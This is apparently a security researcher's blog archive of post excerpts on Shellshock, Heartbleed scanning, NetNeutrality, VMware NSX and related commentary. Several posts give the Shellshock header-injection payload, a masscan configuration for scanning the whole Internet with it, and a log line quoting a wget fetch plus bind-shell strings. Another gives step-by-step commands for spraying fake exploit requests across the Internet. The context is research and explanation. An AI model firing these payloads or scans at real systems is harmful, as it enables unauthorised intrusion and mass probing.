
Category Archives for "Security"

Shellshock is 20 years old (get off my lawn)

The bash issue is 20 years old. By this I don't mean the actual bug is that old (though it appears it might be), but that we've known that long that passing HTTP values to shell scripts is a bad idea.
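To make this concrete, here's a minimal sketch of the pattern in question (script name and contents are hypothetical): the web server copies HTTP request values into environment variables before invoking a CGI script, so whatever the client sends ends up in the shell's environment.

#!/bin/bash
# hello.cgi -- a hypothetical CGI script of the kind common in 1995 (and in
# embedded devices today). The web server has already copied request headers
# into environment variables such as HTTP_USER_AGENT and HTTP_COOKIE.
echo "Content-Type: text/plain"
echo
echo "Your browser is: $HTTP_USER_AGENT"

In 1995 the danger was shell metacharacters smuggled into those values; the 2014 twist is that a vulnerable bash will even execute code trailing a function definition in an environment variable, e.g. a header of "User-Agent: () { :; }; /bin/ping -c 3 attacker.example.com" runs the ping the moment bash imports the environment, before the script's own code executes.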

My first experience with this was in 1995. I worked for "Network General Corporation" (which would later merge with McAfee Associates). At the time, about 1000 people worked for the company. We made the Sniffer, the original packet-sniffer that gave its name to the entire class of products.

One day, the head of IT came to me with an e-mail from some unknown person informing us that our website was vulnerable. He was in standard denial, asking me to confirm that "this asshole is full of shit".

But no, whoever had sent us the email was correct, and obviously so. I was enough of a security expert that our IT guy would come to me, yet I hadn't considered that bug before (to my great embarrassment). Of course, one glance at the email and I knew it was true. I didn't have to try it out on our website, because it was self-evident in the way that Continue reading

Bash ‘shellshock’ bug is wormable

Early results from my scan: there are about 3000 systems vulnerable just on port 80, just on the root "/" URL, without the Host field. That doesn't sound like a lot, but that's not where the bug lives. Update: oops, my scan broke early in the process and stopped capturing the responses -- it's probably a lot more responses than that.

Firstly, only about 1 in 50 webservers respond correctly without the proper Host field. Scanning with the correct domain names would lead to a lot more results -- about 50 times more.

Secondly, it's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi). Getting just the root page is the thing least likely to be vulnerable. Spidering the site, and testing well-known CGI scripts (like the CPanel one) would give a lot more results, at least 10x.

Thirdly, it's embedded webservers on odd ports that are the real danger. Scanning more ports would give a couple times more results.

Fourthly, it's not just web, but other services that are vulnerable, such as the DHCP service reported in the initial advisory.

Consequently, even though my light scan found only 3000 results, this thing is clearly Continue reading

Bash ‘shellshock’ scan of the Internet

NOTE: malware is now using this string as its User-Agent. I haven't run a scan for over two days.

I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72.

The configuration file for masscan looks something like:

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to a bug, so you have to manually add them to the code: https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)
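If you just want to check a single server you own rather than scan the Internet, a rough curl equivalent of the same "ping home" trick looks like this (hostname, path, and YOUR-IP are placeholders; run tcpdump on your own machine and watch for the ICMP echo requests):

curl -s -A '() { :; }; /bin/ping -c 3 YOUR-IP' http://target.example.com/cgi-sys/defaultwebpage.cgi

The -A option sets the User-Agent header, which the web server exports into the CGI environment just like the Cookie, Host, and Referer headers above.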

Some earlier results show that this bug is widespread.
A discussion of the results is in the next blog post, here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.


Bash bug as big as Heartbleed

Today's bash bug is as big a deal as Heartbleed. That's for many reasons.

The first reason is that the bug interacts with other software in unexpected ways. We know that interacting with the shell is dangerous, but we write code that does it anyway. An enormous percentage of software interacts with the shell in some fashion. Thus, we'll never be able to catalogue all the software out there that is vulnerable to the bash bug. This is similar to the OpenSSL bug: OpenSSL is included in a bajillion software packages, so we were never able to fully quantify exactly how much software is vulnerable.
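As an aside, the one-line local test that's been circulating works like this: bash imports environment variables that look like function definitions, and a vulnerable version also executes any code trailing the definition. On an unpatched system this prints "vulnerable":

env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'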

The second reason is that while the known systems (like your web-server) are patched, unknown systems remain unpatched. We see that with the Heartbleed bug: six months later, hundreds of thousands of systems remain vulnerable. These systems are rarely things like webservers, but are more often things like Internet-enabled cameras.

Internet-of-things devices like video cameras are especially vulnerable because a lot of their software is built from web-enabled bash scripts. Thus, not only are they less likely to be patched, they are more likely to expose the vulnerability to the outside world.

Unlike Heartbleed, which Continue reading

It’s the Applications, Stupid (Part 3 of 3)!

If you missed the first 2 parts of this series, you can catch them here and here. The short version is that there are Enterprise customers actively seeking to automate the production deployment of their workloads, and in doing so they discover that capturing business policy as part of the process is critical. We've now arrived at the point where, once policy can be encapsulated in the process of application workload orchestration, it becomes necessary to have infrastructure that understands how to enact and enforce that policy. This is largely a networking discussion, and to date, networking has largely been about any-to-any, all-equal connectivity (at least in data centers), which in many ways means no policy. This post looks at how networking infrastructure can be envisioned differently in the face of applications that can express their own policy.

[As an aside, Rich Fichera over at Forrester Research wrote a great piece on this topic (which unfortunately is behind a pretty hefty paywall unless you're a Forrester client, but I'll provide a link anyway). Rich coins the term "Systems of Engagement" to describe new models for Enterprise applications that depart from the legacy "Systems of Record." If you have access Continue reading

EFF, Animal Farm version

In celebration of "Banned Books Week", the EFF has posted a picture of their employees sitting around "reading" banned books. Amusingly, the person in the back is reading "Animal Farm", a book that lampoons the populist, revolutionary rhetoric the EFF itself uses.

Orwell wrote Animal Farm at the height of World War II, when the Soviet Union was our ally against Germany, and when Stalin was highly regarded by intellectuals. The book attacks Stalin's cult of personality, showing how populist "propaganda controls the opinion of enlightened people in democratic countries". In the book, populist phrases like "All animals are equal" over time get amended with such things as "...but some animals are more equal than others".

The hero worship geeks have for the EFF is a modern form of that cult of personality. Computer geeks unquestioningly support the EFF, even when the EFF contradicts itself. There are many examples, such as supporting coders' rights while simultaneously attacking "unethical" coders. The best example, though, is NetNeutrality, where the EFF wants the government to heavily regulate Internet providers like Comcast. This is a complete repudiation of the EFF's earlier position set forth in their document "Declaration of Independence of Cyberspace Continue reading

It’s the Applications, Stupid (Part 2 of 3)!

In part 1 of this series, I mentioned a customer that was starting to understand how to build application policy into their deployment processes and in turn was building new infrastructure that could understand those policies. That's a lot of usage of the word "policy", so it's probably a good idea to go into a bit more detail on what that means.

In this context, policy refers to how specific IT resources are used in accordance with a business’s rules or practices. A much more detailed discussion of policy in the data center is covered in this most excellent networkheresy blog post (with great additional discussions here and here).  But suffice it to say that getting to full self-service IT nirvana requires that we codify business-centric policy and encapsulate the applications with that policy.

The goals of the previously mentioned customer were pretty simple, actually. They wanted to provide self-service compute, storage, networking, and a choice of application software stacks to their vast army of developers. They wanted this self-service capability to extend beyond development and test workloads to full production workloads, including fully automated deployment. They wanted to provide costs back to the business that were on par Continue reading

Automating a Multi-Action Security Workflow with VMware NSX

This post was written by VMware’s John Dias (VCP-DCV), Sr. Systems Engineer, Cloud Management Solutions Engineering Team, and Hadar Freehling, Security & Compliance Systems Engineer Specialist

***

Through a joint effort with Hadar Freehling, one of my esteemed peers here at VMware, we co-developed a proof-of-concept workflow for a network security use case.  Hadar created a short video showing and explaining the use case, but in summary this is a workflow that reacts to and remediates a security issue flagged by third-party integration with VMware NSX. In the video, TrendMicro is used but it could be any other partner integration with vShield Endpoint.

Here’s what happens:

  • A virus is detected on a VM and is quarantined by the AV solution
  • The AV solution tags the VM with an NSX security tag
  • VMware NSX places the VM in a new Security Group, whose network policies steer all VM traffic through an intrusion prevention system (IPS)
  • vCenter Orchestrator (vCO) monitors the security group for changes, and when a VM is added:
    • a snapshot of the VM is taken for forensic purposes
    • a vSpan session (RSPAN) is set up on the Distributed Virtual Switch to begin capturing inbound/outbound traffic on the VM
    • once the Continue reading

Hacker “weev” has left the United States

Hacker Andrew "weev" Auernheimer, who was unjustly persecuted by the US government and recently freed after a year in jail when the courts agreed his constitutional rights had been violated, has now left the United States for a non-extradition country.

I wonder what that means. On one hand, he could go full black-hat and go on a hacking spree. Hacking doesn't require anything more than a cheap laptop and a dial-up/satellite connection, so it can be done from anywhere in the world.

On the other hand, he could also go full white-hat. There is lots of useful white-hat research that we don't do because of the chilling effect of government. For example, in our VNC research, we don't test default password logins for some equipment, because this can be interpreted as violating the CFAA. However, if 'weev' never intends on traveling to an extradition country, it's something he can do, and report the results to help us secure systems.

Thirdly, he can now freely speak out against the United States. Again, while we theoretically have the right to "free speech", Continue reading

Rebuttal to Volokh’s CyberVor post

The "Volkh Conspiracy" is a wonderful libertarian law blog. Strangely, in the realm of cyber, Volokh ignores his libertarian roots and instead chooses authoritarian commentators, like NSA lawyer Stewart Baker or former prosecutor Marcus Christian. I suspect Volokh is insecure about his (lack of) cyber-knowledge, and therefore defers to these "experts" even when it goes against his libertarian instincts.

The latest example is a post by Marcus Christian about the CyberVor network -- a network that stole 4.5 billion credentials, including 1.2 billion passwords. The data cited in support of its authoritarian conclusions has little value.

A "billion" credentials sounds like a lot, but in reality, few of those credentials are valid. In a separate incident yesterday, 5 million Gmail passwords were dumped to the Internet. Google analyzed the passwords and found only 2% were valid, and that automated defenses would likely have blocked exploitation of most of them. Certainly, 100,000 valid passwords is a large number, but it's not the headline 5 million number.

That's the norm in cyber. Authoritarian types who want to sell you something can easily quote outrageous headline numbers, and while others can recognize the data are hyped, few have the technical expertise to Continue reading

What they claim about NetNeutrality is a lie

The EFF and other activists are promoting NetNeutrality in response to the FCC's request for comment. What they tell you is a lie. I thought I’d write up the major problems with their arguments.


“Save NetNeutrality”


Proponents claim they are trying to “save” NetNeutrality and preserve the status quo. This is a bald-faced lie.

The truth is that NetNeutrality is not now, nor has it ever been, the law. Fast-lanes have always been the norm. Most of your network traffic goes through fast-lanes (“CDNs”), for example.

The NPRM (the FCC request for comments we are all talking about here) quite clearly says: "Today, there are no legally enforceable rules by which the Commission can stop broadband providers from limiting Internet openness".

NetNeutrality means a radical change, from the free-market Internet we’ve had for decades to a government regulated utility like electricity, water, and sewer. If you like how the Internet has been running so far, then you should oppose the radical change to NetNeutrality.


“NetNeutrality is technical”


Proponents claim there is something “technical” about NetNeutrality, that the more of a geek/nerd you are, the more likely you are to support it. They claim NetNeutrality supporters have some sort Continue reading

Vuln bounties are now the norm

When you get sued for a cybersecurity breach (such as in the recent Home Depot case), one of the questions will be "did you follow industry norms?". Your opposition will hire expert witnesses like me to say "no, they didn't".

One of those norms is the "vuln bounty program". These are programs that pay hackers to research and disclose vulnerabilities (bugs) in your products/services. Such bounty programs have proven their worth at companies like Google and Mozilla, and have spread through the industry. The experts in our industry agree: due-diligence in cybersecurity means that you give others an incentive to find and disclose vulnerabilities. Contrariwise, anti-diligence is threatening, suing, and prosecuting hackers for disclosing your vulnerabilities.

There are now two great bounty-as-a-service companies, "HackerOne" and "BugCrowd", that will help you run such a program. I don't know how much it costs, but looking at their long customer lists, I assume it's not too much.

I point this out because a lot of Internet companies have either announced their own programs, or signed onto the above two services, such as the recent announcement by Twitter. All us experts think Continue reading

Masscan does STARTTLS

Just a quick note: I've updated my port-scanner masscan to support STARTTLS, including Heartbleed checks. Thus, if you scan:

masscan 192.168.0.0/16 -p0-65535 --banners --heartbleed

...then it'll find not only all vulnerable SSL servers, but also vulnerable SMTP/POP3/IMAP4/FTP servers using STARTTLS.

The issue is that there are two ways an unencrypted protocol can support SSL. One is to assign a new port number (like 443 instead of 80), establish the SSL connection first, and then run the normal protocol within the encrypted tunnel. The other is the method SMTP uses: start the normal unencrypted SMTP session, issue the "STARTTLS" command to convert the connection to SSL, and then continue SMTP inside the encrypted tunnel.
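You can poke at both styles by hand with openssl's s_client (the hostname is a placeholder; -starttls also accepts smtp, pop3, and ftp):

# implicit SSL: dedicated port, TLS handshake happens first (IMAPS)
openssl s_client -connect mail.example.com:993
# explicit SSL: plaintext IMAP greeting first, then upgraded via STARTTLS
openssl s_client -connect mail.example.com:143 -starttls imap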

Here's what a scan will look like:

Banner on port 143/tcp on 198.51.100.42: [ssl] cipher:0x39 , imap.example.com  
Banner on port 143/tcp on 198.51.100.42: [vuln] SSL[heartbeat] SSL[HEARTBLEED] 
Banner on port 143/tcp on 198.51.100.42: [imap] * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN AUTH=DIGEST-MD5 AUTH=CRAM-MD5] Dovecot ready.\x0a* CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN AUTH=DIGEST-MD5 AUTH=CRAM-MD5\x0aa001 OK Capability completed.\x0aa002

Because of the --banners option, we see the normal Continue reading

Grow up, you babies

When I came home crying to my mommy because somebody at school called me "grahamcracker", my mother told me to just say "sticks and stones may break my bones but names will never hurt me". This frustrated me as a kid, because I wanted my mommy to make it stop, but of course, it's good advice. It was the only good advice back then, and it's the only solution now to stop Internet trolls.

In its quest to ban free speech, this NYTimes article can't even get the definition of the word "troll" right. Here's the correct definition:
"somebody who tries to provoke an emotional reaction"
The way to stop trolls is to grow up and stop giving them that emotional reaction. That's going to be difficult, because we have a nation of whiners and babies who don't want to grow up, who instead want the nanny-state to stop mean people from saying mean things. This leads to a police-state, where the powerful exploit anti-trolling laws to crack down on free-speech.

That NYTimes article claims that trolling leads to incivility. The opposite is true. Incivility doesn't come from me calling you a jerk. Instead, incivility comes from your inability to Continue reading

C10M: The coming DDR4 revolution

Computer memory has been based on the same DRAM technology since the 1970s. Recent developments have been versions of the DDR technology: DDR2, DDR3, and now DDR4. The capacity and transfer speed have been doubling every couple years according to Moore's Law, but the latency has been stuck at ~70 nanoseconds for decades. The recent DDR4 standard won't fix this latency, but it will give us a lot more tools to mitigate its effects.


Latency is bad. If a thread needs data from main memory, it must stop and wait for the equivalent of around 1000 instructions before the data is returned from memory (at 3 GHz, 70 nanoseconds is roughly 200 clock cycles, and a modern core can retire several instructions per cycle). CPU caches mitigate most of this latency by keeping a copy of frequently used data in local, high-speed memory. This allows the processor to continue at full speed without having to wait.

The problem with Internet scale is that it can't be cached. If you have 10 million concurrent connections, each requiring 10-kilobytes of data, you'll need 100-gigabytes of memory. However, processors have only 20-megabytes of cache -- 5,000 times too small to cache everything. That means whenever a packet arrives, the memory associated with that packet will not be in cache. The CPU will have to stop and Continue reading

That Apache 0day was troll

Last week, many people saw what they thought was an Apache 0day. They saw logs with lots of suggestive strings that looked like this:

[28/Jul/2014:20:04:07 +0000] "GET /?\x0a/\x04/\x0a/\x02/\x06/\x08/\x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"
Somebody has come forward and taken credit for this, admitting it was a troll.

This is sort of a personality test. Many of us immediately assumed this was a troll, but that's because we are apt to disbelieve any hype. Others saw this as some new attack, but that's because they are apt to see attacks out of innocuous traffic. If your organization panicked at this "0day attack", which I'm sure some did, then you failed this personality test.


I don't know what tool the troll used, but I assume it was masscan, because that'd be the easiest way to do it. To do this with masscan, get a Debian/Ubuntu VPS and do the following:

apt-get install libpcap-dev dos2unix
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
echo "GET /my0dayexploit.php?a=x0acat+/etc/password HTTP/1.0" >header.txt
echo "Referer: http://troll.com" >>header.txt
echo "" >>header.txt
unix2dos header.txt
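# the DROP rule below keeps the kernel's TCP stack from sending RSTs that
# would kill masscan's user-mode connections (this assumes the masscan
# command below is given --source-port 4321)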
iptables -A INPUT -p tcp --destination-port 4321 -j DROP

bin/masscan 0.0.0.0/0 Continue reading

No, the CIA didn’t spy on other computers

The computers the CIA spied on were owned and operated by the CIA.

I thought I'd mention this detail that is usually missing from today's news about the CIA spying on Senate staffers. The Senate staffers were investigating the CIA's torture program, reviewing classified documents. The CIA didn't trust the staffers, so they set up a special computer network just for the staffers to use -- a network secured and run by the CIA itself.

The CIA, though, spied on what the staffers did on the system. This allowed the CIA to manipulate the investigation. When the staffers found some particularly juicy bit of information, the CIA was able to yank it from the system and re-classify it so that the staffers couldn't use it. Before the final report was ready, the CIA was already able to set the political machine in motion to defend itself from the report.

Thus, what the CIA did was clearly corrupt and wrong. It's just that it isn't what most people understand when they read today's headlines. It wasn't a case of the CIA hacking into other people's computers.

Many stories quote CIA director Brennan who said earlier this year:
I think a lot of people Continue reading

A Customer Perspective: VMware NSX, Micro-Segmentation & Next-Generation Security

VMware NSX and Palo Alto Networks are transforming the data center by combining the fast provisioning of network and security services with next-generation security protection for East-West traffic. At VMworld, John Spiegel, Global IS Communications Manager for Columbia Sportswear, will take the stage to discuss their architecture, their micro-segmentation use case and their experience. This is session SEC1977, taking place on Tuesday, Aug 26, 2:30-3:30 p.m.

Micro-segmentation is quickly emerging as one of the primary drivers for the adoption of NSX. Below, John shares Columbia’s security journey ahead of VMworld.

+++++++++++++++++++++++++++++++++++++++

When I started at Columbia, we were about a $500 million company. Now we’re closing in on $2 billion and hoping to get to $3 billion rather quickly. So as you can imagine, our IT infrastructure has to scale with the business. In 2009, we embarked on a huge project to add a redundant data center for disaster recovery. As part of the project, we partnered with VMware and quickly created a nearly 100% virtualized datacenter. It was a huge success. But something was missing: a security solution that matched our virtualized data center. There just wasn’t a great way to insert security in order to Continue reading

Cliché: open-source is secure

Some in cybersec keep claiming that open-source is inherently more secure or trustworthy than closed-source. This is demonstrably false.

Firstly, there is the problem of usability. Unusable crypto isn't a valid option for most users. Most would rather just not communicate at all, or even risk going to jail, than deal with the typical dependency hell of trying to get open-source to compile. Moreover, open-source apps are notoriously user-hostile, which is why the Linux desktop still hasn't made headway against Windows or Macintosh. The reason is that developers blame users for being stupid for not appreciating how easy their apps are, whereas Microsoft and Apple spend $billions on usability studies, actually listening to users. Desktops like Ubuntu are pretty good -- but only where they exactly copy Windows/Macintosh. Ubuntu still doesn't invest in the usability studies that Microsoft/Apple do.

The second problem is deterministic builds. If I want to install an app on my iPhone or Android, the only usable way is through their app stores. This means downloading the binary, not the source. Without deterministic builds, there is no way to verify the downloaded binary matches the public source. The binary may, in fact, be compiled from different source Continue reading
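To sketch what that verification would look like if builds were deterministic (repository URL and file names are hypothetical):

# build the app from the published source
git clone https://example.com/secureapp.git && cd secureapp && make release
# compare our hash against the binary the app store shipped
sha256sum build/secureapp.bin
sha256sum ~/Downloads/secureapp.bin
# with deterministic builds these two hashes should match; without them, they
# differ even for an honest binary, so the comparison proves nothing
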

Everything can be a bomb

This last week, pranksters replaced the US flag on top of the Brooklyn Bridge with a white flag. Nobody knows who did it, or why. Many in the press have linked this to terrorism, pointing out that it could've been a bomb. Not only have local New York newspapers said this, but so has CNN.

Such irrational fears demonstrate how deeply we've fallen into police-state thinking, where every action is perceived as a potential terrorist threat.

It could've been a bomb, of course. But what could also have been a bomb is a van full of C4 explosives driven across the bridge. There are no checkpoints at either end inspecting vehicles with bomb-sniffing dogs. What also could've been a bomb is a ship full of fertilizer that, when ignited, would act as a small nuke. The point is that everything can be a bomb. Instead of using this as justification for an ever increasing police-state, we just need to accept this and live with the danger -- because this danger is, in the end, tiny. A thousand 9/11 events would still not equal cancer, for example.

I mention this because the former 9/11 commission released a new report yesterday stoking the fears of cyber-terrorism, Continue reading